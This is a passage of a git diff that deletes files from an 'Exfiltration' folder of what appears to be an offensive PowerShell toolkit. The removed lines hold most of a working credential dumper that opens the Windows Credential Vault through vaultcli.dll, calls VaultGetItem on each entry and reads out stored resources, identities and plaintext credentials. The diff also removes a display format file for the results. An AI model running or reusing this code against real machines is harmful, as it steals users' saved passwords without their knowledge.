- $CurrentItem = [Runtime.InteropServices.Marshal]::PtrToStructure($StructAddress, [Type] $VAULT_ITEM) - $StructAddress = [IntPtr] ($StructAddress.ToInt64() + [Runtime.InteropServices.Marshal]::SizeOf([Type] $VAULT_ITEM)) - - $PasswordVaultItem = [IntPtr]::Zero - - if ($OSMajor -ge 6 -and $OSMinor -ge 2) - { - $Result = $Vaultcli::VaultGetItem($VaultHandle, - [Ref] $CurrentItem.SchemaId, - $CurrentItem.pResourceElement, - $CurrentItem.pIdentityElement, - $CurrentItem.pPackageSid, - [IntPtr]::Zero, - 0, - [Ref] $PasswordVaultItem) - } - else - { - $Result = $Vaultcli::VaultGetItem($VaultHandle, - [Ref] $CurrentItem.SchemaId, - $CurrentItem.pResourceElement, - $CurrentItem.pIdentityElement, - [IntPtr]::Zero, - 0, - [Ref] $PasswordVaultItem) - } - - $PasswordItem = $null - - if ($Result -ne 0) - { - Write-Error "Error occured retrieving vault item. Error (0x$($Result.ToString('X8')))" - continue - } - else - { - $PasswordItem = [Runtime.InteropServices.Marshal]::PtrToStructure($PasswordVaultItem, [Type] $VAULT_ITEM) - } - - if ($VaultSchema.ContainsKey($VaultGuid)) - { - $VaultType = $VaultSchema[$VaultGuid] - } - else - { - $VaultType = $VaultGuid - } - - if ($PasswordItem.pAuthenticatorElement -ne [IntPtr]::Zero) - { - $Credential = Get-VaultElementValue $PasswordItem.pAuthenticatorElement - } - else - { - $Credential = $null - } - - $PackageSid = $null - - if ($CurrentItem.pPackageSid -and ($CurrentItem.pPackageSid -ne [IntPtr]::Zero)) - { - $PackageSid = Get-VaultElementValue $CurrentItem.pPackageSid - } - - - $Properties = @{ - Vault = $VaultType - Resource = if ($CurrentItem.pResourceElement) { Get-VaultElementValue $CurrentItem.pResourceElement } else { $null } - Identity = if ($CurrentItem.pIdentityElement) { Get-VaultElementValue $CurrentItem.pIdentityElement } else { $null } - PackageSid = $PackageSid - Credential = $Credential - LastModified = [DateTime]::FromFileTimeUtc($CurrentItem.LastModified) - } - - $VaultItem = New-Object PSObject -Property $Properties - $VaultItem.PSObject.TypeNames[0] = 'VAULTCLI.VAULTITEM' - - $VaultItem - - $null = $Vaultcli::VaultFree($PasswordVaultItem) - } - } - - $null = $Vaultcli::VaultCloseVault([Ref] $VaultHandle) - } - } -} \ No newline at end of file diff --git a/Exfiltration/Get-VaultCredentials.ps1xml b/Exfiltration/Get-VaultCredentials.ps1xml deleted file mode 100644 index 33e909f..0000000 --- a/Exfiltration/Get-VaultCredentials.ps1xml +++ /dev/null @@ -1,37 +0,0 @@ - - - - - VaultItemView - - VAULTCLI.VAULTITEM - - - - - - - Vault - - - Resource - - - Identity - - - Credential - - - PackageSid - - - LastModified - - - - - - - - -- cgit v1.2.3